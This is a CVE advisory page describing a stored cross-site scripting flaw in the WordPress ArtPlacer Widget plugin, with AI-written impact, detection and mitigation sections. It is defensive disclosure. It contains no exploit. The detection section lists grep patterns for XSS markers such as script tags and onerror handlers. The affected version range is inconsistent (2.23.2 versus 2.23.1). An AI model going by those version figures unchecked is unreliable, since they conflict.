CVE-2026-24555
Unknown Unknown - Not Provided
BaseFortify

Publication date: 2026-01-23

Last updated on: 2026-04-28

Assigner: Patchstack

Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in artplacer ArtPlacer Widget artplacer-widget allows Stored XSS.This issue affects ArtPlacer Widget: from n/a through <= 2.23.2.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-01-23
Last Modified
2026-04-28
Generated
2026-06-16
AI Q&A
2026-01-23
EPSS Evaluated
2026-06-15
NVD
CVE-2026-24555
EUVD
EUVD-2026-4369
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
artplacer artplacer_widget to 2.23.1 (inc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-79 The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

CVE-2026-24555 is a Stored Cross-Site Scripting (XSS) vulnerability in the WordPress ArtPlacer Widget Plugin versions up to 2.23.1. It allows an attacker to inject malicious scripts into web pages generated by the plugin. Exploitation requires a privileged user (Contributor or Developer) to interact with a crafted link, page, or form, which then causes the malicious script to execute when other site visitors access the affected pages. [1]

Impact Analysis

This vulnerability can lead to attackers injecting malicious scripts that execute in the browsers of site visitors. This can result in unwanted redirects, display of unauthorized advertisements, or other harmful HTML payloads. However, exploitation requires privileged user interaction, which limits the risk. The overall severity is moderate with a CVSS score of 6.5. [1]

Detection Guidance

Detection involves monitoring for suspicious input or script injections in the ArtPlacer Widget on your WordPress site, especially from users with Contributor or Developer privileges. Since exploitation requires user interaction with crafted inputs, you can check logs for unusual POST requests or URL parameters containing script tags or suspicious payloads. Commands to assist detection might include using web server logs analysis tools or grep commands such as: grep -i '<script' /path/to/access.log or grep -E '(<script|javascript:|onerror=)' /path/to/access.log. Additionally, scanning the affected pages for reflected or stored scripts using security tools or browser developer consoles can help identify exploitation attempts. [1]

Mitigation Strategies

Immediate mitigation steps include restricting or reviewing user privileges to limit who can perform actions as Contributors or Developers, since exploitation requires privileged user interaction. Avoid clicking suspicious links or submitting untrusted forms within the WordPress admin area. Monitor and sanitize inputs where possible. Since no official patch is available yet, consider disabling or removing the ArtPlacer Widget plugin until a fix is released. Implementing Web Application Firewall (WAF) rules to block common XSS payloads targeting this plugin can also reduce risk. [1]

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-24555. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart